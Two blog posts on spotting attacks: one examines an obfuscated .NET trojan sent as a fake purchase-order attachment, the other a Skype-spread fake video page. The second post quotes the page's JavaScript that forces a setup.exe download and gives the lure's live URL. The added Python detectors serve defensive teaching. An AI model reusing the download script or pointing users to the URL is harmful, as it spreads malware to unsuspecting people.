Avoid getting hacked 2 – Suspicious Emails

Posted by Malisa Ncube on

Problem

This morning I received a very interesting email. It urged me to process a purchasing order and had a couple of attachments in it.

Most computer users would probably just download the attachments, double-click and proceed to open. This particular one is very interesting in that it managed to escape the anti-virus application and seemed really legitimate. This is an email which you may receive in your company and you simply open it without knowing what it may do. So I set out to look at it a little deeper.

The following is the screenshot of the email

Would you think this email may be the beginning of a cyber-attack? Well… It could be.

As anyone would do, I opened the attachments and found the following: a zipped executable file with a fake jpeg extension as part of the name – I was careful not to run the executable. The rest of the attachments were useless PDFs with schematics and some Iranian addresses.

Investigation

I fired up my PEBrowser and tried to inspect the contents of “Technical Data Specifications jpeg.exe”. The result was as follows.

I realised it is a .NET application compiled with the 3.5 framework. You can see that it imports the Microsoft Runtime Execution Engine library – mscoree.dll, which is part of the .NET framework. It also clearly shows the .NET methods section, which has 274 methods and 49 classes. It was indeed an executable file, and I made an effort to inspect the IL quickly.

It was obfuscated to prevent people like me from trying to understand what is happening under the hood. I tried using dotPeek to decompile it and search for anything suspicious like PInvokes. Because of the obfuscation I could not tell the logic very well, even through PEBrowser. The IL was confusing because most names had been scrambled to incomprehensible strings. I then saw this.

There is a PInvoke to Kernel32.dll. The program does interact with the system by copying files – which files, in this case, I don't know.

There is quite a lot of logic in this application, and it is not clear what it does; it probably does something very harmful. I'm sure it is not designed to give you Christmas gifts or sing you a lullaby.

I wonder why this was allowed to propagate into my email client. Is it because it is a .NET program and antivirus applications “trust” it? Given that it runs on .NET 3.5, the attack surface is very wide, which is good news for the attacker.
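As an added example (not the author's code), here is a Python check that applies the warning signs the post describes to an attachment: a fake image or document extension sitting in front of .exe, an MZ/PE header, and a populated CLR Runtime Header data directory (entry 14 of the PE optional header), which is what marks a .NET assembly on disk. The minimal PE header it builds for testing is constructed here and is not the real attachment.

```python
import re
import struct
# Fake "document" name followed by .exe, e.g. "... jpeg.exe" or "invoice.pdf.exe".
DOUBLE_EXT = re.compile(r"(?:^|[\s._-])(?:jpe?g|png|gif|pdf|docx?)\.exe$", re.I)

def is_dotnet_pe(data):
    """True if data is a PE image whose CLR Runtime Header directory (index 14) is set."""
    try:
        if data[:2] != b"MZ":
            return False
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            return False
        coff = e_lfanew + 4                       # COFF file header, 20 bytes
        opt = coff + 20                           # optional header follows it
        opt_size = struct.unpack_from("<H", data, coff + 16)[0]
        magic = struct.unpack_from("<H", data, opt)[0]
        dir_off = {0x10B: 96, 0x20B: 112}.get(magic)   # PE32 / PE32+ data directories
        if dir_off is None:
            return False
        entry = opt + dir_off + 14 * 8            # data directory slot 14 = CLR header
        if entry + 8 > opt + opt_size:
            return False
        rva, size = struct.unpack_from("<II", data, entry)
        return rva != 0 and size != 0
    except struct.error:
        return False

def classify_attachment(name, data):
    """Return the warning signs found for one attachment (empty list = none)."""
    findings = []
    if DOUBLE_EXT.search(name):
        findings.append("fake document/image extension before .exe")
    if data[:2] == b"MZ":
        findings.append("PE executable")
    if is_dotnet_pe(data):
        findings.append(".NET assembly (CLR header present)")
    return findings

def build_fake_dotnet_pe(pe32plus=False):
    """Constructed minimal PE header (not a working program) with the CLR directory set."""
    e_lfanew = 0x80
    dos = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    magic, dir_off = (0x20B, 112) if pe32plus else (0x10B, 96)
    opt = bytearray(dir_off + 16 * 8)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<II", opt, dir_off + 14 * 8, 0x2008, 0x48)  # CLR header RVA, size
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x102)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)
```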

So next time you open an email, check carefully what kind of attachments it carries, as you could be a victim of hacking.

Looks like the days of the “I love you” worm are back, but exploiting .NET rather than VBS.

I found this link to be good for non-technical people:
http://www.businessinsider.com/how-to-avoid-being-hacked-2015-4

Avoid getting-hacked – Watch out for trojans

Posted by Malisa Ncube on

Earlier today, I received a message on Skype on my PC from a friend.

Malisa Ncube video: http://24onlineskyvideo.in.ua/video/?n=Malisa%20Ncube 🙂

The message came through a contact on Skype, whose PC I suspect has been infected. On clicking the link, one would see a screen like the one below.

It is quite deceptive in that it pretends to be buffering the video, and the play button in the centre glows like any common video you can play. It was quite suspicious to me at that moment because I was accessing the internet from a restricted network which does not allow videos, YouTube, and other social networks. I was curious, so I clicked the play button. The site pretended to be loading and then displayed the following message.

This was even more interesting because I wondered what plugin I needed to run this video. My first assumption was that when I clicked on the Install plugin… button it would redirect me to Adobe.com and let me install Flash before redirecting back to the site, but no. Clicking on the link downloads a setup.exe file, and you don't know what it may do to your PC.

Let's get back to the beginning and look at the address bar. It reads

http://24onlineskyvideo.in.ua/video/?n=Malisa%20Ncube

so I tried a couple of things. I changed it to

http://24onlineskyvideo.in.ua/video/?n=Saggy%20Pants

and you may already suspect what happened. The initial impression is that of a video personalised to you, but by changing the URL to Saggy Pants, it will be dedicated to Mr Saggy Pants. Now let's look at the source.

The code that presents the install button is as follows:

            <div id="cap">
                <p><img src="images/icon.png?id=5"></p>
                <p>A plugin is needed to display this video</p>
                <p><button onclick="nw()">&nbsp;Install plugin...&nbsp;</button></p>
            </div>

By clicking on the button you invoke the nw() function shown below. The entire site is made up of one HTML file with JavaScript embedded, and the truth is there is no video to talk about here. The player you see on the first page is drawn by a CSS style.

        var nw=function(){
            var b="http://"+location.hostname+"/setup.exe";
            if(navigator.userAgent.toLowerCase().indexOf('chrome')>-1){
                ___newWindow=window.open("data:text/html,"+encodeURIComponent("<html><head><script>window.location.href='about:blank';\x3c/script></head></html>"),"__dFrame");
                window.setTimeout(function(){
                    var a=window.document.createElement("script");
                    a.type="text/javascript";
                    a.text="window.location.href='"+b+"'";
                    ___newWindow.document.head.appendChild(a)
                },100)
            }
            else
                setTimeout(function(){
                    location.href=b;
                },100)

            ga('send', 'pageview', '/d');
        };

I also noticed the developer of the site is interested in analytics for his site, so he embedded some Google Analytics on it as follows.

There is also a comment box below which looks like it will post the comment to your Facebook account. The code is shown below. Check the data-href 🙂

        <div id="comments">
            <div style="position:absolute;top:0;right:0;width:100%;height:400px;z-index:9999"></div>
            <div id="fb-root"></div>
            <script>(function(d, s, id) {
              var js, fjs = d.getElementsByTagName(s)[0];
              if (d.getElementById(id)) return;
              js = d.createElement(s); js.id = id;
              js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.0";
              fjs.parentNode.insertBefore(js, fjs);
            }(document, 'script', 'facebook-jssdk'));</script>
        </div>
        <div class="fb-comments" data-href="http://knowyourmeme.com/videos/106730-like-a-boss" data-width="1000" data-numposts="5" data-colorscheme="light"></div>
        </div>
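As an added example (not the site's or the author's code), a small Python scanner that looks for the three signs this post picks out of the page source: a button whose onclick hands control to script, a script that steers the browser to a same-host .exe download, and a Facebook comments widget whose data-href points at a different host than the page itself. SAMPLE_HTML is a constructed fragment modelled on the snippets quoted above, not the live page.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the fragments quoted above; not the live page.
SAMPLE_HTML = """
<button onclick="nw()">&nbsp;Install plugin...&nbsp;</button>
<script>var nw=function(){var b="http://"+location.hostname+"/setup.exe";location.href=b;};</script>
<div class="fb-comments" data-href="http://knowyourmeme.com/videos/106730-like-a-boss"></div>
"""

class LurePageScanner(HTMLParser):
    """Collects the warning signs described in the post while parsing one page."""
    def __init__(self, page_url):
        super().__init__()
        self.page_host = urlparse(page_url).hostname
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
        elif tag == "button" and a.get("onclick"):
            self.findings.append("button runs script: " + a["onclick"])
        elif "fb-comments" in (a.get("class") or "").split() and a.get("data-href"):
            host = urlparse(a["data-href"]).hostname
            if host != self.page_host:
                self.findings.append("comment widget bound to foreign host: " + str(host))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # The lure builds a same-host ".../setup.exe" URL and navigates the browser to it.
        if self._in_script and "location.href" in data and re.search(r"\.exe['\"]", data):
            self.findings.append("script navigates browser to an .exe download")

def scan_page(page_url, html):
    """Return the list of warning signs found in html served from page_url."""
    scanner = LurePageScanner(page_url)
    scanner.feed(html)
    scanner.close()
    return scanner.findings
```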

NOTE: So next time you open a link, it is important to ensure that it does not prompt you to download some setup file that could enable the hacker to gain access to your PC, or spread through your Skype application by sending messages to your contacts.